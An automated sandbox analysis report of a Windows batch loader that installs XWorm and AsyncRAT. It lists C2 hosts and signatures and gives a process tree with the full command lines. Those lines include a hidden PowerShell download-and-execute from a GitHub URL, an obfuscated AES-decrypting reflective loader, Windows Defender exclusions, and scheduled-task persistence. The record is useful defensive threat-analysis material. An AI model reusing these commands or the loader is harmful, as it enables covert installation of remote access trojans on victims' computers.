Analysis

  • max time kernel
    1050s
  • max time network
    1049s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-07-2024 18:06

General

  • Target

    Loader.bat

  • Size

    264B

  • MD5

    aa1529cc2a98b4e40322ada6fc14fa97

  • SHA1

    ec76803006b95a46bf1fa9c522ec2b19db448d52

  • SHA256

    6020eb188059a9b681b03092198c2d243a8e5ea5040b1d00d5809f56b4276c0d

  • SHA512

    c2680fa4125eb3da74727bd159a361e19678c5cd1efaa096b038b89e7408af34948b4ba1eebd9722626041b1e7fc52fd2e6c516e52c482ab361565f554dcc14f

Malware Config

Extracted

Family

xworm

C2

unique-emotions.gl.at.ply.gg:54742

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

card-buzz.gl.at.ply.gg:2497

Mutex

uE6w2BW3TJU0

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 4 IoCs
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 19 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 27 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Checks processor information in registry
    • Modifies registry class
    PID:788
    • C:\Windows\system32\backgroundTaskHost.exe
      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
      2⤵
        PID:2572
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k RPCSS -p
      1⤵
        PID:900
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:748
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
            1⤵
              PID:1012
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1032
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1104
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1060
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:3012
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1604
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:5100
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1532
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2172
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4532
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2656
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2280
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1060
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2404
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2032
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:180
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4704
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1208
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:1228
                • C:\Users\Admin\AppData\Roaming\Payload.exe
                  C:\Users\Admin\AppData\Roaming\Payload.exe
                  2⤵
                  • Executes dropped EXE
                  PID:844
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1148
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1156
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1272
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1292
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                        1⤵
                          PID:1324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1404
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1464
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                              1⤵
                                PID:1480
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                1⤵
                                  PID:1492
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1564
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                    1⤵
                                      PID:1664
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                      1⤵
                                        PID:1700
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1760
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1784
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                            • Modifies Internet Explorer settings
                                            PID:1872
                                            • C:\Windows\system32\AUDIODG.EXE
                                              C:\Windows\system32\AUDIODG.EXE 0x508 0x4ec
                                              2⤵
                                                PID:3920
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2000
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:2008
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1692
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                    1⤵
                                                      PID:1720
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2060
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                        1⤵
                                                          PID:2292
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                          1⤵
                                                            PID:2328
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2344
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                              1⤵
                                                                PID:2556
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2580
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2588
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2764
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Enumerates connected drives
                                                                    PID:2804
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2840
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                      1⤵
                                                                        PID:2848
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2868
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                          1⤵
                                                                            PID:3344
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            PID:3432
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:2544
                                                                              • C:\Windows\system32\cmd.exe
                                                                                cmd /c start /min "" powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""
                                                                                3⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3416
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/-shgdsaukjjd/releases/download/DSADSADSA/Powershell.bat' -OutFile \"$env:temp\Powershell.bat\"; Start-Process \"$env:temp\Powershell.bat\""
                                                                                  4⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2944
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Powershell.bat" "
                                                                                    5⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3932
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      6⤵
                                                                                        PID:1940
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        6⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1388
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                          7⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4784
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.vbs"
                                                                                          7⤵
                                                                                          • Checks computer location settings
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4692
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat" "
                                                                                            8⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4412
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_896.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              9⤵
                                                                                                PID:3112
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                9⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4656
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Stupido.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Stupido.exe"
                                                                                                  10⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4604
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Payload.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
                                                                                                  10⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Drops startup file
                                                                                                  • Executes dropped EXE
                                                                                                  • Adds Run key to start application
                                                                                                  • Enumerates connected drives
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4020
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Payload.exe'
                                                                                                    11⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4784
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      12⤵
                                                                                                        PID:4692
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Payload.exe'
                                                                                                      11⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:1776
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Payload.exe'
                                                                                                      11⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:512
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Payload" /tr "C:\Users\Admin\AppData\Roaming\Payload.exe"
                                                                                                      11⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:1600
                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                      taskkill /F /IM explorer.exe
                                                                                                      11⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:5032
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                    10⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:1420
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"' & exit
                                                                                                    10⤵
                                                                                                      PID:3744
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'
                                                                                                        11⤵
                                                                                                          PID:3968
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\elgwjq.exe"'')); "
                                                                                                            12⤵
                                                                                                              PID:2460
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                              12⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:1344
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"' & exit
                                                                                                          10⤵
                                                                                                            PID:4768
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /K powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\ikiddm.exe"'
                                                                                                              11⤵
                                                                                                                PID:4340
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSfmvByzaqQRjbUDz6nOUhqppcwMZqNmDZwdIdqTzw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('a5EK7lVcA1pcixu0O1iggA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sGhbZ=New-Object System.IO.MemoryStream(,$param_var); $ybOBT=New-Object System.IO.MemoryStream; $FbGbr=New-Object System.IO.Compression.GZipStream($sGhbZ, [IO.Compression.CompressionMode]::Decompress); $FbGbr.CopyTo($ybOBT); $FbGbr.Dispose(); $sGhbZ.Dispose(); $ybOBT.Dispose(); $ybOBT.ToArray();}function execute_function($param_var,$param2_var){ $Uhdga=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ytJlg=$Uhdga.EntryPoint; $ytJlg.Invoke($null, $param2_var);}$NPsPf = 'C:\Users\Admin\AppData\Local\Temp\Powershell.bat';$host.UI.RawUI.WindowTitle = $NPsPf;$HzgiX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($NPsPf).Split([Environment]::NewLine);foreach ($sRtOc in $HzgiX) { if ($sRtOc.StartsWith('MnANwvoAczzLlzYPfslG')) { $JLNvS=$sRtOc.Substring(20); break; }}$payloads_var=[string[]]$JLNvS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('–ExecutionPolicy Bypass Start-Process -FilePath 